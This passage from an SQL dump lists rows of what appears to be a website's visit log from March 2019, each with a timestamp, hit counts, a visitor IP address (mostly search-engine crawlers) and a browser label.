,0,'54.36.150.180','other'),(401754,1553010060,1,1,0,0,'54.36.150.186','other'),(401755,1553010507,2,2,0,0,'66.249.66.136','chrome'),(401756,1553010823,1,1,0,0,'82.193.106.51','chrome'),(401757,1553010934,1,1,0,0,'54.36.148.53','other'),(401758,1553011419,1,1,0,0,'46.229.168.135','other'),(401759,1553011723,1,1,0,0,'54.36.148.216','other'),(401760,1553011727,1,1,0,0,'216.244.66.241','other'),(401761,1553011810,1,1,0,0,'46.229.168.133','other'),(401762,1553011919,1,1,0,0,'157.55.39.152','other'),(401763,1553011950,2,2,0,0,'66.249.66.136','chrome'),(401764,1553012287,1,1,0,0,'54.36.148.124','other'),(401765,1553012320,1,1,0,0,'13.57.233.99','chrome'),(401766,1553012493,1,1,0,0,'54.36.149.23','other'),(401767,1553013192,1,1,0,0,'46.229.168.142','other'),(401768,1553013267,1,1,0,0,'66.249.66.60','chrome'),(401769,1553013446,1,1,0,0,'54.36.148.100','other'),(401770,1553013709,1,1,0,0,'95.133.152.213','chrome'),(401771,1553014016,2,2,0,0,'216.244.66.241','other'),(401772,1553014075,1,1,0,0,'54.36.148.180','other'),(401773,1553014224,1,1,0,0,'5.45.207.79','other'),(401774,1553014274,3,3,0,0,'95.108.213.4','other'),(401775,1553014328,2,2,0,0,'141.8.142.103','other'),(401776,1553014330,1,1,0,0,'87.250.224.65','other'),(401777,1553014519,2,2,0,0,'87.250.224.47','other'),(401778,1553014727,1,1,0,0,'5.45.207.19','other'),(401779,1553014780,2,2,0,0,'178.154.244.11','other'),(401780,1553014787,1,1,0,0,'66.249.66.60','chrome'),(401781,1553015069,1,1,0,0,'157.55.39.152','other'),(401782,1553015074,1,1,0,0,'54.36.148.234','other'),(401783,1553015075,1,1,0,0,'54.36.148.0','other'),(401784,1553015272,1,1,0,0,'54.36.148.228','other'),(401785,1553015308,1,1,0,0,'141.8.142.103','other'),(401786,1553015531,1,1,0,0,'66.249.66.138','chrome'),(401787,1553015669,1,1,0,0,'54.36.149.91','other'),(401788,1553016300,1,1,0,0,'180.76.15.161','other'),(401789,1553016603,1,1,0,0,'66.249.66.138','chrome'),(401790,1553016749,1,1,0,0,'157.55.39.152','other'),(401791,1553016834,1,1,0,0,'207.46.13.39','other'),(401792,1553016929,1,1,0,0,'46.211.24.237','chrome'),(401793,1553016978,1,1,0,0,'54.36.148.45','other'),(401794,1553016986,1,1,0,0,'157.55.39.71','other'),(401795,1553017346,1,1,0,0,'66.249.66.134','chrome'),(401796,1553017606,1,1,0,0,'46.229.168.142','other'),(401797,1553017830,1,1,0,0,'54.36.150.2','other'),(401798,1553018003,1,1,0,0,'54.36.148.252','other'),(401799,1553018018,1,1,0,0,'66.249.66.136','chrome'),(401800,1553018090,1,1,0,0,'46.229.168.147','other'),(401801,1553018172,1,1,0,0,'8.29.198.27','other'),(401802,1553018262,1,1,0,0,'8.29.198.26','other'),(401803,1553018334,1,1,0,0,'54.36.148.230','other'),(401804,1553018380,1,1,0,0,'54.36.150.178','other'),(401805,1553018596,2,2,0,0,'66.249.66.134','chrome'),(401806,1553018738,1,1,0,0,'66.249.66.60','chrome'),(401807,1553019327,1,1,0,0,'66.249.66.138','chrome'),(401808,1553019405,1,1,0,0,'207.46.13.39','other'),(401809,1553019537,1,1,0,0,'216.244.66.241','other'),(401810,1553019679,1,1,0,0,'54.36.150.85','other'),(401811,1553019723,1,1,0,0,'157.55.39.4','other'),(401812,1553019794,1,1,0,0,'5.196.87.174','other'),(401813,1553020163,1,1,0,0,'54.36.149.82','other'),(401814,1553020226,1,1,0,0,'66.249.66.136','chrome'),(401815,1553020231,2,2,0,0,'66.249.66.134','chrome'),(401816,1553020960,1,1,0,0,'46.229.168.149','other'),(401817,1553021287,1,1,0,0,'46.229.168.135','other'),(401818,1553021393,1,1,0,0,'54.36.148.178','other'),(401819,1553021446,1,1,0,0,'54.36.150.8','other'),(401820,1553021702,1,1,0,0,'46.229.168.133','other'),(401821,1553021932,1,1,0,0,'216.244.66.241','other'),(401822,1553022206,1,1,0,0,'157.55.39.4','other'),(401823,1553022345,1,1,0,0,'54.36.148.66','other'),(401824,1553022623,1,1,0,0,'54.36.149.107','other'),(401825,1553022721,2,2,0,0,'40.77.167.108','other'),(401826,1553022786,1,1,0,0,'54.36.148.140','other'),(401827,1553023417,1,1,0,0,'54.36.148.116','other'),(401828,1553023483,1,1,0,0,'54.36.149.76','other'),(401829,1553023538,1,1,0,0,'54.36.149.47','other'),(401830,1553023545,1,1,0,0,'54.36.148.85','other'),(401831,1553023557,1,1,0,0,'66.249.66.58','chrome'),(401832,1553023569,1,1,0,0,'46.229.168.130','other'),(401833,1553023687,1,1,0,0,'66.249.66.138','chrome'),(401834,1553023911,1,1,0,0,'66.249.66.136','chrome'),(401835,1553023932,1,1,0,0,'66.249.66.134','chrome'),(401836,1553024001,1,1,0,0,'54.36.150.68','other'),(401837,1553024457,1,1,0,0,'46.229.168.148','other'),(401838,1553024512,1,1,0,0,'46.229.168.147','other'),(401839,1553024660,1,1,0,0,'157.55.39.4','other'),(401840,1553024679,2,2,0,0,'216.244.66.241','other'),(401841,1553025132,1,1,0,0,'66.249.66.58','chrome'),(401842,1553025146,1,1,0,0,'54.36.150.142','other'),(401843,1553025364,1,1,0,0,'66.249.66.134','chrome'),(401844,1553025470,1,1,0,0,'66.249.66.136','chrome'),(401845,1553025842,1,1,0,0,'178.154.244.11','other'),(401846,1553026115,1,1,0,0,'54.36.150.9','other'),(401847,1553026262,1,1,0,0,'54.36.148.196','other'),(401848,1553026403,1,1,0,0,'46.229.168.141','other'),(401849,1553026439,1,1,0,0,'66.249.66.134','chrome'),(401850,1553026521,3,3,0,0,'66.249.66.136','chrome'),(401851,1553026562,1,1,0,0,'54.36.148.24','other'),(401852,1553027310,1,1,0,0,'54.36.148.110','other'),(401853,1553027727,2,2,0,0,'66.249.66.136','chrome'),(401854,1553027752,1,1,0,0,'66.249.66.60','chrome'),(401855,1553027765,1,1,0,0,'157.55.39.74','other'),(401856,1553027882,1,1,0,0,'13.66.139.0','other'),(401857,1553028092,1,1,0,0,'130.180.218.234','chrome'),(401858,1553028178,1,1,0,0,'54.36.148.51','other'),(401859,1553028345,1,1,0,0,'54.36.148.155','other'),(401860,1553028466,1,1,0,0,'46.229.168.133','other'),(401861,1553028598,1,1,0,0,'46.229.168.151','other'),(401862,1553028843,1,0,1,0,'66.249.66.136',''),(401863,1553028941,1,1,0,0,'66.249.66.138','chrome'),(401864,1553028996,1,1,0,0,'91.196.178.184','chrome'),(401865,1553028999,1,1,0,0,'46.229.168.146','other'),(401866,1553029021,2,2,0,0,'8.29.198.27','other'),(401867,1553029317,2,2,0,0,'66.249.66.134','chrome'),(401868,1553029488,1,1,0,0,'46.229.168.143','other'),(401869,1553029674,1,1,0,0,'5.196.87.175','other'),(401870,1553029694,1,1,0,0,'54.36.148.116','other'),(401871,1553029793,1,1,0,0,'54.36.148.207','other'),(401872,1553029799,1,1,0,0,'66.249.66.136','chrome'),(401873,1553030007,1,1,0,0,'216.244.66.241','other'),(401874,1553030116,2,2,0,0,'46.229.168.134','other'),(401875,1553030406,1,1,0,0,'66.249.66.58','chrome'),(401876,1553030416,1,1,0,0,'157.55.39.74','other'),(401877,1553030436,1,1,0,0,'54.36.148.71','other'),(401878,1553030627,1,1,0,0,'46.229.168.145','other'),(401879,1553030629,1,1,0,0,'87.250.224.47','other'),(401880,1553030742,1,1,0,0,'141.8.183.23','other'),(401881,1553030843,1,1,0,0,'207.46.13.79','other'),(401882,1553030870,1,1,0,0,'40.77.167.108','other'),(401883,1553031028,1,1,0,0,'37.9.113.148','other'),(401884,1553031069,1,1,0,0,'46.229.168.132','other'),(401885,1553031219,1,1,0,0,'66.249.66.62','chrome'),(401886,1553031321,1,1,0,0,'54.36.148.105','other'),(401887,1553031530,1,1,0,0,'66.249.66.138','chrome'),(401888,1553031725,1,1,0,0,'66.249.66.136','chrome'),(401889,1553031861,1,1,0,0,'54.36.148.72','other'),(401890,1553031928,2,2,0,0,'66.249.66.134','chrome'),(401891,1553032391,1,1,0,0,'54.36.150.15','other'),(401892,1553032471,1,1,0,0,'46.229.168.153','other'),(401893,1553032627,1,1,0,0,'216.244.66.241','other'),(401894,1553032829,7,7,0,0,'136.243.70.151','other'),(401895,1553032952,1,1,0,0,'54.36.150.1','other'),(401896,1553033141,1,1,0,0,'54.36.148.232','other'),(401897,1553033285,1,1,0,0,'66.249.66.58','chrome'),(401898,1553033310,1,1,0,0,'66.249.66.138','chrome'),(401899,1553033590,1,1,0,0,'157.55.39.71','other'),(401900,1553034021,1,1,0,0,'66.249.66.136','chrome'),(401901,1553034041,1,1,0,0,'46.229.168.141','other'),(401902,1553034063,1,1,0,0,'46.229.168.139','other'),(401903,1553034443,1,1,0,0,'207.46.13.79','other'),(401904,1553034493,1,1,0,0,'46.229.168.152','other'),(401905,1553034691,1,1,0,0,'66.249.66.134','chrome'),(401906,1553034731,1,1,0,0,'54.36.148.105','other'),(401907,1553035036,1,1,0,0,'54.36.150.38','other'),(401908,1553035382,1,1,0,0,'66.249.66.136','chrome'),(401909,1553035867,1,1,0,0,'54.36.150.70','other'),(401910,1553035893,1,1,0,0,'54.36.148.178','other'),(401911,1553036534,1,1,0,0,'46.229.168.134','other'),(401912,1553036547,1,1,0,0,'54.36.149.103','other'),(401913,1553036868,1,1,0,0,'46.229.168.140','other'),(401914,1553037476,1,1,0,0,'54.36.150.89','other'),(401915,1553037601,1,1,0,0,'54.36.148.252','other'),(401916,1553038003,1,1,0,0,'54.36.149.72','other'),(401917,1553038256,1,1,0,0,'54.36.149.2','other'),(401918,1553038314,1,1,0,0,'54.36.148.5','other'),(401919,1553038832,1,1,0,0,'207.46.13.143','other'),(401920,1553039249,1,1,0,0,'46.229.168.153','other'),(401921,1553039283,1,1,0,0,'180.76.15.147','other'),(401922,1553039451,1,1,0,0,'66.249.66.134','chrome'),(401923,1553039533,1,1,0,0,'5.45.207.79','other'),(401924,1553039808,1,1,0,0,'37.9.113.148','other'),(401925,1553039820,3,3,0,0,'5.45.207.19','other'),(401926,1553039849,1,1,0,0,'95.108.213.4','other'),(401927,1553039868,1,1,0,0,'8.29.198.26','other'),(401928,1553039988,1,1,0,0,'8.29.198.27','other'),(401929,1553039989,1,1,0,0,'46.229.168.133','other'),(401930,1553040158,2,2,0,0,'141.8.142.103','other'),(401931,1553040310,1,1,0,0,'54.36.148.63','other'),(401932,1553040352,1,1,0,0,'54.36.148.39','other'),(401933,1553040430,1,1,0,0,'46.229.168.143','other'),(401934,1553040515,1,1,0,0,'178.94.172.66','chrome'),(401935,1553040648,1,1,0,0,'91.196.178.136','chrome'),(401936,1553040790,1,1,0,0,'54.36.148.105','other'),(401937,1553041053,1,1,0,0,'54.36.148.0','other'),(401938,1553041263,1,1,0,0,'5.196.87.172','other'),(401939,1553041400,1,1,0,0,'54.36.150.161','other'),(401940,1553041601,1,1,0,0,'66.249.66.134','chrome'),(401941,1553042081,1,1,0,0,'66.249.66.136','chrome'),(401942,1553042234,2,2,0,0,'141.8.142.103','other'),(401943,1553042236,1,1,0,0,'95.108.213.4','other'),(401944,1553042388,1,1,0,0,'66.249.66.138','chrome'),(401945,1553043056,2,2,0,0,'207.46.13.79','other'),(401946,1553043057,1,1,0,0,'216.244.66.241','other'),(401947,1553043133,1,1,0,0,'54.36.148.121','other'),(401948,1553043177,1,1,0,0,'46.229.168.146','other'),(401949,1553043534,1,1,0,0,'95.163.255.44','other'),(401950,1553043801,2,2,0,0,'95.163.255.42','other'),(401951,1553043999,1,1,0,0,'54.36.148.185','other'),(401952,1553044199,1,1,0,0,'95.163.255.47','other'),(401953,1553044216,1,1,0,0,'54.36.148.58','other'),(401954,1553044291,1,1,0,0,'46.229.168.152','other'),(401955,1553044703,1,1,0,0,'207.46.13.177','other'),(401956,1553044790,1,1,0,0,'54.36.150.81','other'),(401957,1553045040,1,1,0,0,'66.249.66.60','chrome'),(401958,1553045097,1,1,0,0,'54.36.150.119','other'),(401959,1553045259,2,2,0,0,'40.77.167.48','other'),(401960,1553045350,1,1,0,0,'46.229.168.138','other'),(401961,1553045385,1,1,0,0,'54.36.149.73','other'),(401962,1553045542,1,1,0,0,'54.36.149.32','other'),(401963,1553045635,1,1,0,0,'54.36.148.47','other'),(401964,1553045778,1,1,0,0,'54.36.148.240','other'),(401965,1553045946,2,2,0,0,'216.244.66.241','other'),(401966,1553046181,1,1,0,0,'40.77.167.48','other'),(401967,1553046365,1,1,0,0,'54.36.150.175','other'),(401968,1553046926,1,1,0,0,'207.46.13.79','other'),(401969,1553046965,1,1,0,0,'46.229.168.134','other'),(401970,1553047028,1,1,0,0,'66.249.66.134','chrome'),(401971,1553047160,1,1,0,0,'46.229.168.137','other'),(401972,1553047215,1,1,0,0,'46.229.168.151','other'),(401973,1553047448,1,1,0,0,'66.249.66.138','chrome'),(401974,1553047832,1,1,0,0,'178.154.244.11','other'),(401975,1553048046,1,1,0,0,'54.36.148.19','other'),(401976,1553048114,1,1,0,0,'66.249.66.136','chrome'),(401977,1553048549,1,1,0,0,'40.77.167.136','other'),(401978,1553048866,1,1,0,0,'46.229.168.137','other'),(401979,1553049049,5,5,0,0,'178.154.244.11','other'),(401980,1553049157,1,1,0,0,'207.46.13.79','other'),(401981,1553049158,2,2,0,0,'5.45.207.79','other'),(401982,1553049267,2,2,0,0,'5.45.207.19','other'),(401983,1553049433,1,1,0,0,'95.163.255.45','other'),(401984,1553049436,2,2,0,0,'95.163.255.43','other'),(401985,1553049437,2,2,0,0,'95.163.255.49','other'),(401986,1553049446,1,1,0,0,'157.55.39.239','other'),(401987,1553049735,1,1,0,0,'46.229.168.138','other'),(401988,1553049755,1,1,0,0,'157.55.39.247','other'),(401989,1553049968,1,1,0,0,'141.8.142.103','other'),(401990,1553049994,1,1,0,0,'66.249.66.136','chrome'),(401991,1553050053,1,1,0,0,'95.163.255.44','other'),(401992,1553050132,1,1,0,0,'54.36.150.148','other'),(401993,1553050187,1,1,0,0,'54.36.150.3','other'),(401994,1553050203,2,2,0,0,'5.45.207.79','other'),(401995,1553050368,1,1,0,0,'54.36.148.108','other'),(401996,1553050608,1,1,0,0,'54.36.150.43','other'),(401997,1553050647,1,1,0,0,'40.77.167.190','other'),(401998,1553050714,1,1,0,0,'54.36.150.51','other'),(401999,1553050718,2,2,0,0,'8.29.198.27','other'),(402000,1553050886,1,1,0,0,'40.77.167.136','other'),(402001,1553051113,1,1,0,0,'54.36.150.70','other'),(402002,1553051126,1,1,0,0,'66.249.66.136','chrome'),(402003,1553051828,1,1,0,0,'46.229.168.135','other'),(402004,1553051847,1,1,0,0,'54.36.148.2','other'),(402005,1553052324,1,1,0,0,'54.36.149.20','other'),(402006,1553052337,1,1,0,0,'207.46.13.181','other'),(402007,1553052631,1,1,0,0,'54.36.148.138','other'),(402008,1553052684,1,1,0,0,'34.215.91.134','other'),(402009,1553052802,1,1,0,0,'54.36.148.55','other'),(402010,1553052869,1,1,0,0,'207.46.13.102','other'),(402011,1553053395,1,1,0,0,'66.249.66.138','chrome'),(402012,1553053657,3,3,0,0,'46.229.168.143','other'),(402013,1553054079,2,2,0,0,'66.249.66.136','chrome'),(402014,1553054641,1,1,0,0,'46.229.168.139','other'),(402015,1553054841,1,1,0,0,'54.36.150.96','other'),(402016,1553054944,1,1,0,0,'66.249.66.60','chrome'),(402017,1553055023,1,1,0,0,'54.36.148.106','other'),(402018,1553055209,1,1,0,0,'46.229.168.154','other'),(402019,1553055272,1,1,0,0,'54.36.149.24','other'),(402020,1553055589,1,1,0,0,'46.229.168.136','other'),(402021,1553055687,1,1,0,0,'66.249.66.138','chrome'),(402022,1553055892,1,1,0,0,'54.36.150.74','other'),(402023,1553055949,2,2,0,0,'207.46.13.102','other'),(402024,1553056236,1,1,0,0,'54.36.148.239','other'),(402025,1553056484,1,1,0,0,'54.36.150.21','other'),(402026,1553057280,2,2,0,0,'207.46.13.140','other'),(402027,1553057435,1,1,0,0,'40.77.167.136','other'),(402028,1553057608,1,1,0,0,'54.36.149.57','other'),(402029,1553057638,1,1,0,0,'54.36.148.194','other'),(402030,1553057662,1,1,0,0,'54.36.150.187','other'),(402031,1553057991,1,1,0,0,'91.196.178.135','firefox'),(402032,1553058049,1,1,0,0,'54.36.150.32','other'),(402033,1553058157,1,1,0,0,'46.229.168.141','other'),(402034,1553058451,1,1,0,0,'91.124.119.243','chrome'),(402035,1553058751,1,1,0,0,'66.249.66.60','chrome'),(402036,1553058765,1,1,0,0,'5.45.207.79','other'),(402037,1553058789,1,1,0,0,'180.76.15.17','other'),(402038,1553058905,1,1,0,0,'40.77.167.111','other'),(402039,1553059002,1,1,0,0,'23.228.81.10','chrome'),(402040,1553059132,1,1,0,0,'54.36.149.57','other'),(402041,1553059208,1,1,0,0,'54.36.148.149','other'),(402042,1553059321,2,2,0,0,'60.191.38.77','firefox'),(402043,1553059469,1,1,0,0,'54.36.150.80','other'),(402044,1553059525,1,1,0,0,'54.36.149.65','other'),(402045,1553059597,1,1,0,0,'37.9.113.103','other'),(402046,1553060106,1,1,0,0,'5.45.207.79','other'),(402047,1553060113,1,1,0,0,'66.249.66.58','chrome'),(402048,1553060224,1,1,0,0,'128.72.159.196','msie'),(402049,1553060377,2,2,0,0,'66.249.66.138','chrome'),(402050,1553060506,2,2,0,0,'95.163.255.42','other'),(402051,1553060593,2,2,0,0,'66.249.66.134','chrome'),(402052,1553060717,1,1,0,0,'95.163.255.43','other'),(402053,1553060720,1,1,0,0,'95.163.255.48','other'),(402054,1553060820,2,2,0,0,'52.27.171.183','chrome'),(402055,1553061197,1,1,0,0,'207.46.13.149','other'),(402056,1553061369,1,1,0,0,'95.163.255.45','other'),(402057,1553061540,1,1,0,0,'54.36.150.94','other'),(402058,1553061579,1,1,0,0,'8.29.198.26','other'),(402059,1553061696,1,1,0,0,'8.29.198.25','other'),(402060,1553061727,1,1,0,0,'66.249.66.60','chrome'),(402061,1553061841,1,1,0,0,'37.204.188.209','chrome'),(402062,1553061926,1,1,0,0,'66.249.66.136','chrome'),(402063,1553062058,1,1,0,0,'91.196.178.93','chrome'),(402064,1553062508,1,1,0,0,'91.196.178.90','chrome'),(402065,1553062815,1,1,0,0,'54.36.148.142','other'),(402066,1553062943,1,1,0,0,'5.196.87.174','other'),(402067,1553063228,1,1,0,0,'54.36.150.173','other'),(402068,1553063374,1,1,0,0,'192.42.116.16','other'),(402069,1553063504,1,1,0,0,'54.36.150.104','other'),(402070,1553063622,1,1,0,0,'66.249.66.134','chrome'),(402071,1553063773,1,1,0,0,'54.36.150.24','other'),(402072,1553063846,2,2,0,0,'66.249.66.138','chrome'),(402073,1553063975,1,1,0,0,'95.108.181.75','other'),(402074,1553064119,1,1,0,0,'54.36.148.6','other'),(402075,1553064189,1,1,0,0,'66.249.66.136','chrome'),(402076,1553064348,1,1,0,0,'54.36.149.14','other'),(402077,1553064351,1,1,0,0,'54.36.150.10','other'),(402078,1553064680,1,1,0,0,'66.249.66.134','chrome'),(402079,1553064752,1,1,0,0,'207.46.13.149','other'),(402080,1553065077,1,1,0,0,'207.46.13.132','other'),(402081,1553065094,1,1,0,0,'46.229.168.151','other'),(402082,1553065150,1,1,0,0,'54.36.150.129','other'),(402083,1553065226,1,1,0,0,'54.36.150.40','other'),(402084,1553065307,1,1,0,0,'54.36.148.12','other'),(402085,1553065520,2,2,0,0,'207.46.13.150','other'),(402086,1553065536,1,1,0,0,'54.36.149.91','other'),(402087,1553065558,1,1,0,0,'95.163.255.42','other'),(402088,1553065723,1,1,0,0,'54.36.149.53','other'),(402089,1553065782,2,2,0,0,'95.163.255.43','other'),(402090,1553066177,1,1,0,0,'54.36.150.20','other'),(402091,1553066219,1,0,1,0,'66.249.66.134',''),(402092,1553066306,1,1,0,0,'46.229.168.134','other'),(402093,1553066490,1,1,0,0,'95.163.255.49','other'),(402094,1553066533,1,1,0,0,'54.36.150.105','other'),(402095,1553066655,1,1,0,0,'54.36.150.164','other'),(402096,1553066708,1,1,0,0,'54.36.148.1','other'),(402097,1553066734,1,1,0,0,'46.229.168.138','other'),(402098,1553067028,1,1,0,0,'54.36.149.74','other'),(402099,1553067277,2,2,0,0,'66.249.66.134','chrome'),(402100,1553067511,1,1,0,0,'66.249.66.60','chrome'),(402101,1553067543,1,1,0,0,'54.36.150.185','other'),(402102,1553067593,1,1,0,0,'54.36.150.111','other'),(402103,1553067694,1,1,0,0,'54.36.150.139','other'),(402104,1553067698,1,1,0,0,'173.252.127.11','chrome'),(402105,1553068260,1,1,0,0,'54.36.150.161','other'),(402106,1553068378,1,1,0,0,'54.36.148.176','other'),(402107,1553068679,1,1,0,0,'54.36.148.31','other'),(402108,1553068730,1,1,0,0,'54.36.150.143','other'),(402109,1553068739,1,1,0,0,'54.36.149.30','other'),(402110,1553068762,1,1,0,0,'40.77.167.70','other'),(402111,1553068858,2,2,0,0,'5.45.207.19','other'),(402112,1553069021,3,3,0,0,'5.45.207.79','other'),(402113,1553069261,1,1,0,0,'54.36.148.249','other'),(402114,1553069412,2,2,0,0,'178.154.244.11','other'),(402115,1553069419,1,1,0,0,'54.36.150.117','other'),(402116,1553069426,1,0,1,0,'66.249.66.60',''),(402117,1553069460,1,1,0,0,'46.229.168.148','other'),(402118,1553069518,1,1,0,0,'37.9.113.148','other'),(402119,1553069573,1,1,0,0,'54.36.148.4','other'),(402120,1553069608,1,1,0,0,'193.189.127.179','firefox'),(402121,1553069691,1,1,0,0,'46.229.168.129','other'),(402122,1553069840,2,2,0,0,'157.55.39.139','other'),(402123,1553069883,1,1,0,0,'54.36.149.48','other'),(402124,1553069942,1,1,0,0,'54.36.150.51','other'),(402125,1553070199,1,1,0,0,'46.229.168.145','other'),(402126,1553070265,1,1,0,0,'46.229.168.153','other'),(402127,1553070486,1,1,0,0,'54.36.150.181','other'),(402128,1553070828,1,1,0,0,'54.36.148.64','other'),(402129,1553071492,1,1,0,0,'95.163.255.49','other'),(402130,1553071788,1,1,0,0,'54.36.148.96','other'),(402131,1553071953,1,1,0,0,'46.229.168.151','other'),(402132,1553072131,1,1,0,0,'95.163.255.43','other'),(402133,1553072282,1,1,0,0,'207.46.13.132','other'),(402134,1553072425,2,2,0,0,'8.29.198.26','other'),(402135,1553072686,1,1,0,0,'216.244.66.241','other'),(402136,1553072767,1,1,0,0,'54.36.148.196','other'),(402137,1553072989,1,1,0,0,'95.163.255.44','other'),(402138,1553073131,1,1,0,0,'37.53.90.175','chrome'),(402139,1553073258,1,1,0,0,'66.249.66.60','chrome'),(402140,1553073458,1,1,0,0,'54.36.148.175','other'),(402141,1553073963,1,1,0,0,'54.36.149.34','other'),(402142,1553074062,1,1,0,0,'37.53.90.175','chrome'),(402143,1553074082,1,1,0,0,'54.36.148.5','other'),(402144,1553074135,1,1,0,0,'54.36.149.10','other'),(402145,1553074216,1,1,0,0,'46.229.168.154','other'),(402146,1553074234,1,1,0,0,'46.229.168.137','other'),(402147,1553074279,1,1,0,0,'54.36.149.51','other'),(402148,1553074400,1,1,0,0,'54.36.150.62','other'),(402149,1553074531,1,1,0,0,'188.239.246.208','firefox'),(402150,1553074610,1,1,0,0,'66.249.79.94','chrome'),(402151,1553075486,2,2,0,0,'188.190.251.156','other'),(402152,1553075640,1,1,0,0,'54.36.148.72','other'),(402153,1553075723,1,1,0,0,'54.36.148.88','other'),(402154,1553075905,1,1,0,0,'54.36.148.81','other'),(402155,1553076005,1,1,0,0,'130.180.212.56','chrome'),(402156,1553076217,1,1,0,0,'54.36.148.70','other'),(402157,1553076457,1,1,0,0,'130.180.210.188','chrome'),(402158,1553076474,1,1,0,0,'37.53.128.160','chrome'),(402159,1553076526,1,1,0,0,'91.209.11.236','other'),(402160,1553076708,2,2,0,0,'95.213.141.126','opera'),(402161,1553076737,1,1,0,0,'66.249.66.134','chrome'),(402162,1553076876,1,1,0,0,'91.124.182.170','firefox'),(402163,1553077274,1,1,0,0,'141.8.142.103','other'),(402164,1553077680,1,1,0,0,'95.163.255.42','other'),(402165,1553077778,1,1,0,0,'54.36.148.240','other'),(402166,1553077870,1,1,0,0,'54.36.148.135','other'),(402167,1553077883,1,1,0,0,'54.36.148.131','other'),(402168,1553077907,2,2,0,0,'95.163.255.49','other'),(402169,1553077913,1,1,0,0,'95.134.202.37','chrome'),(402170,1553078368,3,3,0,0,'95.163.255.46','other'),(402171,1553078638,2,2,0,0,'66.249.66.136','chrome'),(402172,1553078652,1,1,0,0,'54.36.149.70','other'),(402173,1553078679,1,1,0,0,'91.196.178.93','chrome'),(402174,1553078760,2,2,0,0,'66.249.66.138','chrome'),(402175,1553079115,3,3,0,0,'5.45.207.19','other'),(402176,1553079123,1,1,0,0,'66.249.66.134','chrome'),(402177,1553079192,1,1,0,0,'46.229.168.129','other'),(402178,1553079228,2,2,0,0,'5.45.207.79','other'),(402179,1553079391,1,1,0,0,'178.154.244.11','other'),(402180,1553079438,1,1,0,0,'87.250.224.47','other'),(402181,1553079470,1,1,0,0,'46.96.48.53','chrome'),(402182,1553079744,2,2,0,0,'37.9.113.103','other'),(402183,1553079860,1,1,0,0,'180.76.15.24','other'),(402184,1553079892,1,1,0,0,'37.9.113.148','other'),(402185,1553080050,1,1,0,0,'141.8.142.103','other'),(402186,1553080164,1,1,0,0,'91.196.178.93','chrome'),(402187,1553080205,1,1,0,0,'54.36.150.100','other'),(402188,1553080307,32,32,0,0,'54.87.18.165','other'),(402189,1553080444,2,2,0,0,'66.249.66.62','chrome'),(402190,1553080809,1,1,0,0,'40.77.167.3','other'),(402191,1553080865,1,1,0,0,'46.229.168.148','other'),(402192,1553081021,1,1,0,0,'54.36.149.74','other'),(402193,1553081282,1,1,0,0,'91.196.179.33','chrome'),(402194,1553081318,9,9,0,0,'54.87.18.165','other'),(402195,1553081343,1,1,0,0,'54.36.149.15','other'),(402196,1553081649,1,1,0,0,'66.249.66.136','chrome'),(402197,1553081977,2,2,0,0,'66.249.66.134','chrome'),(402198,1553082113,1,1,0,0,'54.36.150.62','other'),(402199,1553082268,15,15,0,0,'54.87.18.165','other'),(402200,1553082289,1,1,0,0,'40.77.167.4','other'),(402201,1553082467,1,1,0,0,'54.36.148.24','other'),(402202,1553083194,15,15,0,0,'54.87.18.165','other'),(402203,1553083268,1,1,0,0,'54.36.148.142','other'),(402204,1553083297,1,1,0,0,'8.29.198.25','other'),(402205,1553083416,1,1,0,0,'8.29.198.27','other'),(402206,1553083462,1,1,0,0,'66.249.66.60','chrome'),(402207,1553083502,1,1,0,0,'95.163.255.42','other'),(402208,1553083537,3,3,0,0,'66.249.66.134','chrome'),(402209,1553083791,1,1,0,0,'141.8.142.103','other'),(402210,1553083827,1,1,0,0,'54.36.148.25','other'),(402211,1553083883,1,1,0,0,'54.36.148.22','other'),(402212,1553084097,9,9,0,0,'54.87.18.165','other'),(402213,1553084340,1,1,0,0,'209.17.96.34','other'),(402214,1553084405,1,1,0,0,'91.196.178.93','chrome'),(402215,1553085042,1,1,0,0,'54.36.150.163','other'),(402216,1553085049,1,1,0,0,'46.229.168.142','other'),(402217,1553085100,1,1,0,0,'91.211.135.230','chrome'),(402218,1553085157,1,1,0,0,'54.36.148.26','other'),(402219,1553085182,1,1,0,0,'54.36.148.81','other'),(402220,1553085626,1,1,0,0,'91.196.178.93','chrome'),(402221,1553085678,3,3,0,0,'130.180.218.228','chrome'),(402222,1553085984,1,1,0,0,'195.189.196.60','chrome'),(402223,1553086076,1,1,0,0,'66.249.66.138','chrome'),(402224,1553086506,1,1,0,0,'54.36.149.4','other'),(402225,1553087177,1,1,0,0,'54.36.148.15','other'),(402226,1553087245,2,2,0,0,'66.249.66.138','chrome'),(402227,1553087508,1,1,0,0,'66.249.66.134','chrome'),(402228,1553087740,1,1,0,0,'91.196.178.186','chrome'),(402229,1553087919,1,1,0,0,'40.77.167.171','other'),(402230,1553087930,1,1,0,0,'54.36.150.168','other'),(402231,1553088083,1,1,0,0,'54.36.150.4','other'),(402232,1553088105,1,1,0,0,'46.229.168.129','other'),(402233,1553088275,1,1,0,0,'178.154.244.11','other'),(402234,1553088690,1,1,0,0,'95.163.255.45','other'),(402235,1553089224,1,1,0,0,'46.229.168.154','other'),(402236,1553089280,1,1,0,0,'54.36.148.127','other'),(402237,1553089283,1,1,0,0,'91.196.178.179','chrome'),(402238,1553089310,1,1,0,0,'46.229.168.136','other'),(402239,1553089605,1,1,0,0,'46.229.168.150','other'),(402240,1553090043,1,1,0,0,'91.124.182.170','firefox'),(402241,1553090063,1,1,0,0,'95.163.255.46','other'),(402242,1553090180,1,1,0,0,'46.229.168.147','other'),(402243,1553090299,1,1,0,0,'95.163.255.45','other'),(402244,1553090320,1,1,0,0,'54.36.150.173','other'),(402245,1553090512,1,1,0,0,'54.36.148.192','other'),(402246,1553090523,1,1,0,0,'54.36.148.112','other'),(402247,1553090740,1,1,0,0,'91.196.178.90','chrome'),(402248,1553091287,1,1,0,0,'54.36.148.223','other'),(402249,1553091303,1,1,0,0,'5.45.207.79','other'),(402250,1553091624,1,1,0,0,'54.36.148.162','other'),(402251,1553092195,1,1,0,0,'54.36.148.11','other'),(402252,1553092291,1,1,0,0,'91.196.177.46','chrome'),(402253,1553092301,1,1,0,0,'91.196.178.93','chrome'),(402254,1553092764,1,1,0,0,'91.196.178.179','chrome'),(402255,1553093066,1,1,0,0,'66.249.66.134','chrome'),(402256,1553093500,1,1,0,0,'5.45.207.79','other'),(402257,1553093510,1,1,0,0,'5.45.207.19','other'),(402258,1553093567,1,1,0,0,'54.36.148.225','other'),(402259,1553094111,1,1,0,0,'46.219.61.42','chrome'),(402260,1553094159,2,2,0,0,'8.29.198.27','other'),(402261,1553094296,1,1,0,0,'95.163.255.49','other'),(402262,1553094409,1,1